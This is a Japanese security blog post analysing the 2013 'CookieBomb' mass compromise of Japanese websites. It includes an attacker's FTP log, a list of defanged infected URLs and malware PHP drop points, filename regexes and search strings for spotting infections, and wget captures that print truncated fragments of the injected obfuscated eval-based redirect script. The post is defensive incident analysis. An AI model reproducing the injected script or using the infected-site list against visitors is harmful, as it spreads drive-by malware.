2013年7月17日の追加情報ですが、最新情報を先に報告させて頂きます:
本事件の原因がサイトのFTPアカウントが取られてしまいましたと確認しました。
証拠として、下記はハッキングされた時のFTPロとなります↓
次の質問は「どうやってFTPアカウント情報が取られたのか?」←可能性としては①ftp brute、②マルウェア感染と③パネル脆弱性ですね。最新情報以上です。
本事件の原因がサイトのFTPアカウントが取られてしまいましたと確認しました。
証拠として、下記はハッキングされた時のFTPロとなります↓
[2013/07/11 21:46:54] xxxxxxxx 71.89.72.41: C="PASS (hidden)" B=- S=530 [2013/07/11 21:46:55] xxxxxxxx 83.138.146.85: C="USER xxxxxxxx" B=- S=331 [2013/07/11 21:46:55] xxxxxxxx 83.138.146.85: C="PASS (hidden)" B=- S=230 [2013/07/11 21:46:55] xxxxxxxx 83.138.146.85: C="SYST" B=- S=215 [2013/07/11 21:46:55] xxxxxxxx 83.138.146.85: C="LIST /" D= B=211 S=226 [2013/07/11 21:46:56] xxxxxxxx 83.138.146.85: C="LIST public_html/" D= B=630 S=226 [2013/07/11 21:46:56] xxxxxxxx 83.138.146.85: C="LIST public_html/data/" D= B=124 S=226 [2013/07/11 21:46:57] xxxxxxxx 83.138.146.85: C="LIST public_html/images/" D= B=1219 S=226 [2013/07/11 21:46:57] xxxxxxxx 83.138.146.85: C="STOR public_html//KJQb9RkC.gif" F=- B=- S=552 T=- [2013/07/11 21:46:57] xxxxxxxx 83.138.146.85: C="STOR public_html/cgi-bin/KJQb9RkC.gif" F=- B=- S=552 T=- [2013/07/11 21:46:58] xxxxxxxx 83.138.146.85: C="STOR public_html/data/KJQb9RkC.gif" F=- B=- S=552 T=- [2013/07/11 21:46:58] xxxxxxxx 83.138.146.85: C="STOR public_html/images/KJQb9RkC.gif" F=- B=- S=552 T=- [2013/07/11 21:46:58] xxxxxxxx 83.138.146.85: C="RETR public_html//index.html" F=/public_html/index.html B=10486 S=226 T=0.199 [2013/07/11 21:46:59] xxxxxxxx 83.138.146.85: C="STOR public_html//index.html" F=- B=- S=- T=- [2013/07/11 21:46:59] xxxxxxxx 83.138.146.85: C="RETR public_html/index.html" F=- B=- S=550 T=- [2013/07/11 21:47:00] xxxxxxxx 83.138.146.85: C="RETR public_html/index.html-1" F=/public_html/index.html-1 B=7484 S=226 T=0.189 [2013/07/11 21:47:00] xxxxxxxx 83.138.146.85: C="STOR public_html/index.html-1" F=- B=- S=- T=-↑自動PUSH仕組みを見えますので、間違いなくFTPハッキングツールですね。
次の質問は「どうやってFTPアカウント情報が取られたのか?」←可能性としては①ftp brute、②マルウェア感染と③パネル脆弱性ですね。最新情報以上です。
前回報告しましたOCJP-010とOCJP-011の感染事件の関連で、グーグルで検索したら追加感染されたサイトの情報が沢山出ます。
最初はさくっと検索したら8件の結果だけが出ましたが、検索の条件を直したら沢山結果が出ました...、
一応最初の3件のダウンロードのログをこのポストに書きましたが、沢山あるので他は画像キャップチャーで感染の証拠として取りました。
感染の追加情報ですが、感染されたサイトには殆どトップページ(index関係ファイル)にやられて、それと他マルウェアPHPファイルがインジェクションされてしまう可能性が高いです。例:この感染されたサイト→「hxxp://green-w.co.jp/」ですね、index/トップページにいたずらjavascriptコード(下記の画像キャップチャーように)を発見しました。このコードは来るブラウザのアクセスがマルウェア感染の受け側に転送する目的です(OCJP-111:インジェクションコードの説明、下記の画像)。
(ブラウザのアクセスログはこちらです)
さらに、同じサイトに「hxxp://green-w.co.jp/20050605/esd.php」も発見しました。このURLは受ける側のマルウェア感染スクリプトです。受け側ファイルについては下記のファイル名のREGEXで発見が出来ます(殆どは3文字.php)
[a-z]{3,}.php
[a-z0-9]{8}.php
[a-z]{3,}.asp
[0-9]{1}.html
stat.*↑やはりリモートのログインが出来てしまうから色々コードやファイルインジェクション攻撃が出来るでしょ。本事件の検索方法はグーグルで下記のキーワードを検索したら沢山出てきます:
ps="split";e=eval;v=検索した結果は下記の画像:
shellで感染コードを確認をする場合、現状はsplit、eval、try、catch、docの英文単語でgrepが出来ます、例えば:
本件の攻撃は「CookieBomb」といいますが(攻撃の名前を私が作りましたけど…)、英文で詳細説明を書きましたのでアクセスはこちらです。
全体的に自分の検索と確認したURLは下記となります↓
hxxp://abeyoume.com/sekojirei/ue.html hxxp://www7.ocn.ne.jp/%7Egbusters hxxp://ww82.tiki.ne.jp/%7Ekazu-o hxxp://hima-moba.com/ hxxp://www.sst-gp.com/ hxxp://www.bokushoku.com/ hxxp://www.gp-yoyaku.com/ hxxp://tbeu.or.jp/ hxxp://gokuu1789.com/ hxxp://shop907.com/ hxxp://mms-law.jp/ hxxp://iwamoto-k.jp/ hxxp://airtight.jp/ hxxp://ohuk.jp/ hxxp://ps-c.net/ hxxp://www.wavemouse.net/ hxxp://antjapan.co.jp/ hxxp://tenmasub.co.jp/ hxxp://funplace.co.jp/ hxxp://organogold.sub.jp/ hxxp://as-nakakita.co.jp/ hxxp://tomiyameister.com/ hxxp://rscik.com/ hxxp://kokorogarden.com/ hxxp://fintech.jp/german/index.htm hxxp://kousaiji.net hxxp://bioloft.jp/ hxxp://pappie.pupu.jp/ hxxp://hito-takara.co.jp/ hxxp://iroirotube.com/ hxxp://sports.boy.jp/ hxxp://kiti-livi.com/ hxxp://www.kk-nishimaki.co.jp/newshop/event/springfare.html hxxp://www.kirg.jp/kouen15/ hxxp://puritaku.eek.jp/ hxxp://amanari.com/ hxxp://alldesign-jp.fool.jp/counter.php <===マルウェア関係PHPスクリプトです、サーバ側でご確認してほしいです。 hxxp://pinkcontact.net/esd.php <===マルウェア関係PHPスクリプトです、サーバ側でご確認してほしいです。 hxxp://home.kanto-gakuin.ac.jp/%7Eakiyak2 hxxp://asiyanocho.jp/ hxxp://kaze-school.com/ hxxp://gh-takeda.com/ hxxp://avance-web.jp/ hxxp://www.sekai-brand.com/b-topix.html hxxp://www.k2.dion.ne.jp/%7Elegend/ hxxp://www.k3.dion.ne.jp/%7Eaj_ikada/ hxxp://www.h5.dion.ne.jp/%7Ey_bilder/ hxxp://sekai-brand.com/casio.html hxxp://rockbook01.awe.jp/dekome/ hxxp://rockbook01.bulog.jp/machiuke hxxp://queenuruga.weblog.am/count.php hxxp://nangoku-m.kikirara.jp/m/count.php hxxp://lsio.org/ hxxp://harlem-deli.com/ hxxp://green-w.co.jp/20050605/esd.php hxxp://funabashi.otakaraya.net/ hxxp://funtech-jp.com/ hxxp://edogawa.petsitter.co.jp/ hxxp://chiisagata-kyo.or.jp/ hxxp://bdragoon.sakuraweb.com/ hxxp://www.eco.zaq.jp/kankyokaizen_gaina_nikko hxxp://www4.ocn.ne.jp/%7Eiwamo/ hxxp://watasui.com/ hxxp://planscom.net/ hxxp://odasuido.com/ hxxp://nature-nail.com/ hxxp://bct-kondo.net/ hxxp://www.amanari.com/spa.html hxxp://www.egami-dental.com/ hxxp://www.iwami.or.jp/tnktoso/ hxxp://k-kanetsu.co.jp/ hxxp://sbd-osaka.com/ hxxp://1450.co.jp/toiawase.html hxxp://kangotensyoku.pinoko.jp/ hxxp://nandemo-kaitori.com/ hxxp://saitokoumuten.co.jp/ hxxp://shikakuguide.info/ hxxp://takumi-juku.com/ hxxp://watanabeke.com/ hxxp://overseas-travelinsurance.com/ hxxp://youwa-fudousan.jp/ hxxp://pinkdragon.geo.jp/ hxxp://bb-verdure.com/ //←ここからは7月15日からの発見 hxxp://www.joyojc.jp/ hxxp://nn7.jp/ hxxp://manga-cover.com/ hxxp://chubu-moudouken.jp/ hxxp://lily-aloma.com/ hxxp://nissenkai.or.jp/ hxxp://www.fujitoy.co.jp/ hxxp://www.ken-architect.jp/ hxxp://kuramotoya-sekizai.co.jp/ hxxp://kenkou-land.mints.ne.jp/ hxxp://toukaimulti.co.jp/ hxxp://ko-ki.co.jp/ hxxp://www.yokatoko.jp/ hxxp://sizuku-gp.jp/ hxxp://www.alpha-tantei.com/ hxxp://syukumoukyousei.sakura.ne.jp/ hxxp://haru-salon.com/ hxxp://info-g.net/blog/ hxxp://truste-shop.info/rss/ hxxp://www.art-tokugawa.com/ hxxp://www.seiho-corp.co.jp/english/service.html hxxp://www.sinou.co.jp/wmp-osusume_chin/ hxxp://atene.co.jp/ hxxp://nichido-garo.co.jp/ hxxp://e-sees.co.jp/ hxxp://www.htnc.jp/ hxxp://murasaki-tantanmura.com/ hxxp://superoffice.jp/ hxxp://matsu-office.net/ hxxp://healthy-1.net/ hxxp://truste-shop.info/rss/ hxxp://www.yokatoko.jp/ hxxp://sophia-21.com/ hxxp://miwachiro.com/ hxxp://www.radiocaroline.jp/ hxxp://www.esn.co.jp/ hxxp://www.h-okura.com/header.htm hxxp://www.babyroo.net/ hxxp://toycarland.co.jp/ hxxp://galu-gifu.jp/ hxxp://epo-tohoku.jp/00/ontai/ hxxp://tokyo-suidouya.jp/ hxxp://oneonone.jp/ hxxp://www.speedway.ne.jp/~i-nokai/ hxxp://club-soul.jp/ hxxp://www.fhgradeschool.com/ hxxp://www.rugbycaensud.com/ hxxp://kurisetsu.co.jp/ hxxp://luxurymariage.net/ hxxp://tb9.jp/ hxxp://www.navi55.net/ hxxp://www.maidoplaza.jp/ hxxp://www.kurotoshiroya.jp/ hxxp://www.sekai-brand.com/lv.html hxxp://standard-sg.co.jp/ hxxp://shako-shoumei.com/ hxxp://c-party.co.jp/ hxxp://ee-hand.jp/ hxxp://hs-s.info/ hxxp://interhost.jp/ hxxp://hwm8.spaaqs.ne.jp/egamin hxxp://savoy.vc/ hxxp://natural-bs.info/ hxxp://www.ict-yurigaoka.com/ hxxp://emu-francaise.jp/ hxxp://georgespie.com/ hxxp://lovelyearth.webdeki-hp.com/ hxxp://e-niwa.in/profile hxxp://www.printoffice.jp/↑確認済み新しい感染されたサイトを追加します。
3件のログについて、FreeBSDのshellで取ったログをペーストします(いたずらコードが駆除された状態)↓
abeyoume.comの感染証拠↓
--2013-07-14 17:31:37-- hxxp://abeyoume.com/sekojirei/ue.html
Resolving abeyoume.com (abeyoume.com)... 202.191.112.47
Caching abeyoume.com => 202.191.112.47
Connecting to abeyoume.com (abeyoume.com)|202.191.112.47|:80... connected.
:
GET /sekojirei/ue.html HTTP/1.1
Host: abeyoume.com
HTTP request sent, awaiting response...
:
HTTP/1.1 200 OK
Date: Sun, 14 Jul 2013 08:31:36 GMT
Server: Apache/1.3.41 (Unix) PHP/5.2.6 mod_ssl/2.8.31 OpenSSL/0.9.7m
Last-Modified: Sat, 22 Jun 2013 23:05:29 GMT
ETag: "1bd400f-1398-51c62db9"
Accept-Ranges: bytes
Content-Length: 5016
Keep-Alive: timeout=5, max=10
Connection: Keep-Alive
Content-Type: text/html
:
200 OK
Registered socket 4 for persistent reuse.
Length: 5016 (4.9K) [text/html]
Saving to: `test4.txt'
2013-07-14 17:31:37 (478 KB/s) - `test4.txt' saved [5016/5016]
@unixfreaxjp /malware]$ less test4.txt
<!D0CTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<HTML>
<HEAD>
<META http-equiv="Content-Type" content="text/html; charset=Shift_JIS">
<META name="GENERATOR" content="IBM WebSphere Studio Homepage Builder Version 10.0.0.0 for Windows">
<META http-equiv="Content-Style-Type" content="text/css">
<TITLE></TITLE>
</HEAD>
<BODY>
<P align="center"><IMG src="topimg/title.jpg" width="735" height="60" border="0"></P><!--0c0896--><script type="text/javascript" language="javascript" > ps="split";e=eval;v="Ox";a=0;z="y";try{a*=25}catch(zz){a=1}if(!a)
{try{--e("doc"+"ument")["\x62od"+z]}catch(q){a2="_";sa=Oxa-02;}z="28_6e_7d
_76_6b_7c_71_77_76_28_82_82_82_6e_6e_6e_30_31_28_83_15_12_
28_7e_69_7a_28_7f_6d_76_7a_28_45_28_6c_77_6b_7d_75_6d_76_7
c_36_6b_7a_6d_69_7c_6d_4d_74_6d_75_6d_76_7c_30_2f_71_6e_7a
_69_75_6d
:
// カット…カット…www7.ocn.ne.jpの感染証拠
--2013-07-14 17:27:05-- hxxp://www7.ocn.ne.jp/%7Egbusters
Resolving www7.ocn.ne.jp (www7.ocn.ne.jp)... 122.1.234.204
Caching www7.ocn.ne.jp => 122.1.234.204
:
GET /%7Egbusters HTTP/1.1
Host: www7.ocn.ne.jp
Connection: Keep-Alive
HTTP request sent, awaiting response...
:
HTTP/1.1 301 Moved Permanently
Date: Sun, 14 Jul 2013 08:27:05 GMT
Server: Apache
Location: hxxp://www7.ocn.ne.jp/~gbusters/
Keep-Alive: timeout=10, max=99
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=iso-8859-1
:
301 Moved Permanently
Registered socket 4 for persistent reuse.
URI content encoding = `iso-8859-1'
Location: hxxp://www7.ocn.ne.jp/~gbusters/ [following]
Skipping 236 bytes of body: [<!D0CTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>301 Moved Permanently</TITLE>
</HEAD><BODY>
<H1>Moved Permanently</H1>
The document has moved <A HREF="hxxp://www7.ocn.ne.jp/~gbusters/">here</A>.<P>
</BODY></HTML>
] done.
URI content encoding = None
:
--2013-07-14 17:27:05-- hxxp://www7.ocn.ne.jp/~gbusters/
Reusing existing connection to www7.ocn.ne.jp:80.
:
GET /~gbusters/ HTTP/1.1
Host: www7.ocn.ne.jp
HTTP request sent, awaiting response...
:
HTTP/1.1 200 OK
Date: Sun, 14 Jul 2013 08:27:05 GMT
Server: Apache
Last-Modified: Sat, 22 Jun 2013 23:18:24 GMT
ETag: "f3ac67-1350-51c630c0"
Accept-Ranges: bytes
Content-Length: 4944
Keep-Alive: timeout=10, max=99
Connection: Keep-Alive
Content-Type: text/html
:
200 OK
Length: 4944 (4.8K) [text/html]
Saving to: `test3.txt'
2013-07-14 17:27:05 (559 KB/s) - `test3.txt' saved [4944/4944]
@unixfreaxjp /malware]$ less test3.txt
"test3.txt" may be a binary file. See it anyway?
<META http-equiv="Content-Type" content="text/html; charset=Shift_JIS"><META name="GENERATOR" content="JustSystems Homepage Builder Version 16.0.1.0 for Windows"><P align="center"><B><FONT size="7"><82><A8><92>m<82><E7><82><B9></FONT></B></P><!--0c0896--><script type="text/javascript" language="javascript" > p
s="split";e=eval;v="Ox";a=0;z="y";try{a*=25}catch(zz){a=1}if(!a){try{--e("doc"+"ument")["\x62od"+z]}catch(q){a2="_";sa=Oxa-02;}z="28_6e_7d_76_6b_7c_
71_77_76_28_82_82_82_6e_6e_6e_30_31_28_83_15_12_28_7e_69_
7a_28_7e_7b_80_77_28_45_28_6c_77_6b_7d_75_6d_76_7c_36_6b_
7a_6d_69_7c_6d_4d_74_6d_75_6d_76_7c_30_2f_71_6e_7a_69_75_
6c_81_
:
// カット…カット…ww82.tiki.ne.jpの感染証拠
--2013-07-14 17:14:30-- hxxp://ww82.tiki.ne.jp/%7Ekazu-o
Resolving ww82.tiki.ne.jp (ww82.tiki.ne.jp)... 218.40.30.153
Caching ww82.tiki.ne.jp => 218.40.30.153
Connecting to ww82.tiki.ne.jp (ww82.tiki.ne.jp)|218.40.30.153|:80... connected.
:
GET /%7Ekazu-o hxxp/1.1
Host: ww82.tiki.ne.jp
hxxp request sent, awaiting response...
:
hxxp/1.1 301 Moved Permanently
Server: Apache
Location: hxxp://ww82.tiki.ne.jp/~kazu-o/
Content-Type: text/html; charset=iso-8859-1
Content-Length: 239
Date: Sun, 14 Jul 2013 08:14:33 GMT
X-Varnish: 1049443871
Age: 0
Via: 1.1 varnish
Connection: keep-alive
:
301 Moved Permanently
Registered socket 3 for persistent reuse.
URI content encoding = `iso-8859-1'
Location: hxxp://ww82.tiki.ne.jp/~kazu-o/ [following]
Skipping 239 bytes of body: [<!D0CTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="hxxp://ww82.tiki.ne.jp/~kazu-o/">here</a>.</p>
</body></html>
] done.
URI content encoding = None
:
--2013-07-14 17:14:33-- hxxp://ww82.tiki.ne.jp/~kazu-o/
Reusing existing connection to ww82.tiki.ne.jp:80.
Reusing fd 3.
:
GET /~kazu-o/ hxxp/1.1
Referer: hxxp://google.com/
Host: ww82.tiki.ne.jp
hxxp request sent, awaiting response...
:
hxxp/1.1 200 OK
Server: Apache
Last-Modified: Sat, 22 Jun 2013 18:14:27 GMT
ETag: "2423c0e-13f9-265b26c0"
Content-Type: text/html
Content-Length: 5113
Date: Sun, 14 Jul 2013 08:14:33 GMT
X-Varnish: 1049443872
Age: 0
Via: 1.1 varnish
Connection: keep-alive
:
200 OK
Length: 5113 (5.0K) [text/html]
Saving to: `~kazu-o'
2013-07-14 17:14:33 (2.91 MB/s) - `~kazu-o' saved [5113/5113]
@unixfreaxjp /malware]$ less ~kazu-o
"\~kazu-o" may be a binary file. See it anyway?
<html>
<head>
<title>My HP</title> <!--<82><F0><8B>L<93><FC>-->
</head>
<body bgcolor="white" text="#663300" link="#336600" vlink="blue" alink="#996600">
<b>
<div align="left">
<br><br>
<a href="01fuushi-seijika/index.html"><b><81>E<8D><91><82><CC><90><AD><8E><A1><89><C6><82><CD><82>P<82>R<82>O<96>
<9C><89>~/<8C><8E><81>B<8E><9F><89><F1><91>I<8B><93><82><C5><82><CC><8E><F1><82><C2><82><C8><82><AC><82><AA><91>
<E5><8E><96><81>B<97><A7><96>@<8B>@<8A><D6><82><C9><8F><8A><91><AE><82><B5><82><C8><82><AA><82><E7><96>@<88><C4>
<82><C8><82><C7><8A><D6><92>m<82><B9><82><B8><81>B</b></a><81>@<81>@<81>@<81>@<81>@<81>@<81>@<81>@
<br clear="all">
<br><br>
<a href="02gardening/index.html"><b><81>E<82>Q<82>O<82>P<82>Q<94>N<82>P<82>O<8C><8E><82>P<82>O<93><FA><81>A<83>x
<83><89><83><93><83>_<89><80><8C>|<81><A8><92>n<96><CA><89><80><8C>|<82><D6></b></a>
<br><br>
</div><!--0c0896--><script type="text/javascript" language="javascript" > ps="split";e=eval;v="Ox";a=0;z="y";try{a*=25}catch(zz){a=1}if(!a)
{try{--e("doc"+"ument")["\x62od"+z]}catch(q){a2="_";sa=Oxa-02;}z="28_6e_
7d_76_6b_7c_71_77_76_28_82_82_82_6e_6e_6e_30_31_28_83_15_
12_28_7e_69_7a_28_74_80_69_6f_6e_28_45_28_6c_77_6b_7d_75_
6d_76_7c_36_6b_7a_6d_69_7c_6d_4d_74_6d_75_6d_76_7c_30_2f_
71_6e_7a_69_75_6d_2f_31_43_15_12_15_12_28_74_80_69_6f_6e_
:
// カット…カット…その他感染されたサイトの画像キャップチャー(全部ではありません)↓
などなど...
現段階も未だ新しい感染も出てきましたが、もしあなたのサイトがこのコードにインジェクションされたら、早めにそのファイルを直して、ログイン情報を変更して下さい。その後サーバのリモートアクセスのログをチェックして、不明なアクセスがあるかどうかをご確認下さい。なお、不明なアクセスが見つけた場合、間違いなくウェブサイトのセキュリティ問題(ハッキング事件)がありますので、サイトの管理者窓口とJP-CERT/CCにご報告をお願いいたします。
0 件のコメント:
コメントを投稿